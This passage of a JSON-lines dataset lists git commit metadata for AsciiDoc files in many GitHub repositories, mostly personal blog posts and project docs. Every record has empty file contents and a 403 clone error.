2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20feab3e89552a5b156e9df6733d45abd8d3c237","subject":"Update 2014-08-14-Consistency-of-choices.adoc","message":"Update 2014-08-14-Consistency-of-choices.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-08-14-Consistency-of-choices.adoc","new_file":"_posts\/2014-08-14-Consistency-of-choices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b8167ae6b7f104ebda2b799d743a0e01fbd5168","subject":"Update 2016-04-11-Buffer-Overflow-basico.adoc","message":"Update 
2016-04-11-Buffer-Overflow-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00c7b1c5ad35b0af82991a89630c297c882d0a1f","subject":"Start documentation for Model","message":"Start documentation for Model\n","repos":"soslan\/skjs,soslan\/skjs,soslan\/skjs","old_file":"docs\/model.adoc","new_file":"docs\/model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soslan\/skjs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e448b2b24fa5abf305f349ce61b5db1dc10c0f25","subject":"fixed formatting","message":"fixed formatting\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec5e5cf2cbe79d437c4d7edcee1f8ab521b22a2d","subject":"y2b create post The Military Tough MacBook!","message":"y2b create post The Military Tough MacBook!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-16-The-Military-Tough-MacBook.adoc","new_file":"_posts\/2016-08-16-The-Military-Tough-MacBook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f278c74c7c6e5bb3c08f8964dec6b8e25034394","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92d22598d85204b1f334d5606e609a209314786d","subject":"Update 2016-07-29-kanban.adoc","message":"Update 2016-07-29-kanban.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-29-kanban.adoc","new_file":"_posts\/2016-07-29-kanban.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c273eb9f3c0a72a3a6b01aea82ba31cc362cadd1","subject":"Redund expl","message":"Redund 
expl\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d8ea8584908d0262bdafabb038db0b746eb815b","subject":"y2b create post DON'T Buy The Google Pixel Buds","message":"y2b create post DON'T Buy The Google Pixel Buds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-07-DON'T%20Buy%20The%20Google%20Pixel%20Buds.adoc","new_file":"_posts\/2018-02-07-DON'T%20Buy%20The%20Google%20Pixel%20Buds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"203ba909fbd1912e5815516db7792c900338a9c2","subject":"Update 2016-08-01-Test-Post.adoc","message":"Update 2016-08-01-Test-Post.adoc","repos":"DavidTPate\/davidtpate.com,DavidTPate\/davidtpate.com,DavidTPate\/davidtpate.com,DavidTPate\/davidtpate.com","old_file":"_posts\/2016-08-01-Test-Post.adoc","new_file":"_posts\/2016-08-01-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavidTPate\/davidtpate.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a094ddefbf3c3658bbb7263f591d2be65d859c68","subject":"Update 2017-04-20-Back-Home.adoc","message":"Update 2017-04-20-Back-Home.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-04-20-Back-Home.adoc","new_file":"_posts\/2017-04-20-Back-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9edfe32910f76798440461be6a2dbf0c5488bf66","subject":"Shared AOT Cache","message":"Shared AOT Cache\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2018-03-12-shared-aot-cache.adoc","new_file":"content\/news\/2018-03-12-shared-aot-cache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5655673246555af8579dc82f8d1c696d09af41ec","subject":"Update 2015-04-15-mon-blog.adoc","message":"Update 2015-04-15-mon-blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-mon-blog.adoc","new_file":"_posts\/2015-04-15-mon-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2076d6dbfff74cfc67d3a97a99c01695a9f02153","subject":"SWARM-1650: documentation of datasources should include validation settings (#685)","message":"SWARM-1650: documentation of datasources should include validation settings (#685)\n\nMotivation\r\n----------\r\nThe `datasources` fraction 
documentation should include full examples\r\nof datasource configuration as shown in EAP documentation:\r\nhttps:\/\/access.redhat.com\/documentation\/en-us\/red_hat_jboss_enterprise_application_platform\/7.0\/html\/configuration_guide\/datasource_management#example_datasource_configurations\r\n\r\nThis mainly includes connection validation settings, which is\r\nimportant in case a DB temporarily goes away and then returns back.\r\n\r\nModifications\r\n-------------\r\nAdded examples of MySQL, PostgreSQL and Oracle datasources, showing\r\nall the configuration options included in the EAP documentation.\r\n\r\nResult\r\n------\r\nMore complete documentation for datasources.","repos":"nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core","old_file":"fractions\/javaee\/datasources\/README.adoc","new_file":"fractions\/javaee\/datasources\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77a23179e18117ee54c201f1a38c646c4c16097b","subject":"Added user journey for Heroku","message":"Added user journey for Heroku\n","repos":"crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast","old_file":"product\/docs\/src\/docs\/asciidoc\/HerokuUserJourney.adoc","new_file":"product\/docs\/src\/docs\/asciidoc\/HerokuUserJourney.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crispab\/codekvast.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e24202c1e2cff137825e9b518186c2de35eac9f4","subject":"Update 2016-05-05-deleted.adoc","message":"Update 2016-05-05-deleted.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-05-deleted.adoc","new_file":"_posts\/2016-05-05-deleted.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb2c6fcfa769962ac8edeb34e552eaa069dc4e46","subject":"Update 2018-10-31-H-T-M-L.adoc","message":"Update 2018-10-31-H-T-M-L.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"762cf17a38f1366687fd7c3fbe565ce6a8e32956","subject":"Wording S9","message":"Wording S9\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Divers\/Extractor.adoc","new_file":"Divers\/Extractor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ab147afb7c506ab018e26da694ae91dbe1e2d40","subject":"Proposal of plan-based quota check, scaling and scheduling","message":"Proposal of plan-based quota check, scaling and scheduling\n\nIssue #746\n","repos":"jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/design\/resource-scheduler.adoc","new_file":"documentation\/design_docs\/design\/resource-scheduler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3a5498487022a941c1562191cad052fa9aee497","subject":"Corrections and expansion to instructions for building from source","message":"Corrections and expansion to instructions for building from source\n\nChange-Id: I0a4b0ef2fba46972408b516e3df3432b8ae1ae23\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7080\nTested-by: jenkins\nReviewed-by: Misty Stanley-Jones <266ae30cabf4e046de6d26e3d43b9d21b534ee4c@cloudera.com>\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ea1f0c4990d0ae51ee7667a08b6f2b25169b396","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"2c638d03162f708b6ed6c55d7ba7abc1fc6a97f8","subject":"Link QCM","message":"Link QCM\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2e0bdf3a571918a966f62ac157825f68a36922f","subject":"y2b create post World's Smallest 3D Printing Pen","message":"y2b create post World's Smallest 3D Printing Pen","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-10-Worlds-Smallest-3D-Printing-Pen.adoc","new_file":"_posts\/2016-06-10-Worlds-Smallest-3D-Printing-Pen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8026d57ee8c1aed57f71a36e16200bedf77ce7b7","subject":"Publish 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Publish 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e2c1ae491b67c960a3289a896c2aad5623e084e","subject":"y2b create post Unboxing Preview \\\/ Mailbox SURPRISE!","message":"y2b create post Unboxing Preview \\\/ Mailbox SURPRISE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-09-Unboxing-Preview--Mailbox-SURPRISE.adoc","new_file":"_posts\/2012-05-09-Unboxing-Preview--Mailbox-SURPRISE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c74ab00020334f7d4560ff74003867bca73ad8a6","subject":"Update 2015-08-04-Scala-for-the-Impatient-Chapter-01.adoc","message":"Update 2015-08-04-Scala-for-the-Impatient-Chapter-01.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-08-04-Scala-for-the-Impatient-Chapter-01.adoc","new_file":"_posts\/2015-08-04-Scala-for-the-Impatient-Chapter-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d08b1196bce2017f84ac8179af4c21641fce2848","subject":"y2b create post Unboxing The World's Smallest Phone","message":"y2b create post Unboxing The World's Smallest 
Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-06-Unboxing-The-Worlds-Smallest-Phone.adoc","new_file":"_posts\/2018-01-06-Unboxing-The-Worlds-Smallest-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39266bf8e4dbde26975731047bf87574d6dddade","subject":"Update 2015-03-05-Nouveau.adoc","message":"Update 2015-03-05-Nouveau.adoc","repos":"fbridault\/sandblog,fbridault\/sandblog,fbridault\/sandblog","old_file":"_posts\/2015-03-05-Nouveau.adoc","new_file":"_posts\/2015-03-05-Nouveau.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbridault\/sandblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbeac4618c402382204a2b253627714fc2920643","subject":"Update 2017-05-16-IDE-IDE.adoc","message":"Update 2017-05-16-IDE-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16-IDE-IDE.adoc","new_file":"_posts\/2017-05-16-IDE-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3cf96a23756954a6f63d863d7e58b1c5aa7976","subject":"Renamed '_posts\/2017-08-19.adoc' to '_posts\/2017-08-19-Prepare.adoc'","message":"Renamed '_posts\/2017-08-19.adoc' to '_posts\/2017-08-19-Prepare.adoc'","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-08-19-Prepare.adoc","new_file":"_posts\/2017-08-19-Prepare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ddcb8a756345e2e72567457692d958231db2389","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"feccac96052e51038a39444ef58a9cb83b89bb7e","subject":"Update 2017-09-20-BPMN.adoc","message":"Update 2017-09-20-BPMN.adoc","repos":"egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io,egorlitvinenko\/egorlitvinenko.github.io","old_file":"_posts\/2017-09-20-BPMN.adoc","new_file":"_posts\/2017-09-20-BPMN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/egorlitvinenko\/egorlitvinenko.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"01bd08318a6120c9b89f6236430b116ba2a1c4e0","subject":"Update 2015-12-05-My-title.adoc","message":"Update 2015-12-05-My-title.adoc","repos":"MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io","old_file":"_posts\/2015-12-05-My-title.adoc","new_file":"_posts\/2015-12-05-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MichaelIT\/MichaelIT.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff27106aa7f8dfbc5366c3e5a8e25b55e86125d8","subject":"Update 2016-08-08-New-blog.adoc","message":"Update 2016-08-08-New-blog.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-New-blog.adoc","new_file":"_posts\/2016-08-08-New-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c887a84416e7950702d0a3a213124b83c429b4f9","subject":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","message":"Update 2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_file":"_posts\/2016-06-30-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc303fc8a6f69400277f6d0708d2d2d04acf2599","subject":"Create Readme.adoc","message":"Create Readme.adoc","repos":"alejandroSuch\/angular-cli","old_file":"1.0.0-beta.22\/ubuntu\/Readme.adoc","new_file":"1.0.0-beta.22\/ubuntu\/Readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alejandroSuch\/angular-cli.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6527c6a1ab097415b181a3eb2d7acdb26ce6f40b","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9291f2264f9ad04f08c39e927009c6fca5c2ab49","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f5fb4ef4c52c3854254f362cf50f6485b06c03d","subject":"rename getstarted to example","message":"rename getstarted to example\n","repos":"hibersap\/hibersap.github.io","old_file":"example\/index.adoc","new_file":"example\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hibersap\/hibersap.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2125580ec7310cd5006887cc366ece7b6857144","subject":"blog: into to Hazelcast and Mongo","message":"blog: into to Hazelcast and Mongo\n","repos":"gAmUssA\/hazelcast-mongo-experiments","old_file":"Hazelcast For MongoDB users.adoc","new_file":"Hazelcast For MongoDB users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gAmUssA\/hazelcast-mongo-experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5b62e43ef7a04344791c56ebf89626339758505","subject":"Adding a new blog entry","message":"Adding a new blog entry\n","repos":"luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org","old_file":"news\/2014-03-14-Http-Session-Failover-WildFly.adoc","new_file":"news\/2014-03-14-Http-Session-Failover-WildFly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45607198c7f3766b23ae0db52477c70e773d042e","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66e488f9957683fee966e1b07de3f23be3ff1cb0","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05388c52e6ed1967d5ff7713119eb66647c17bf6","subject":"Publish 
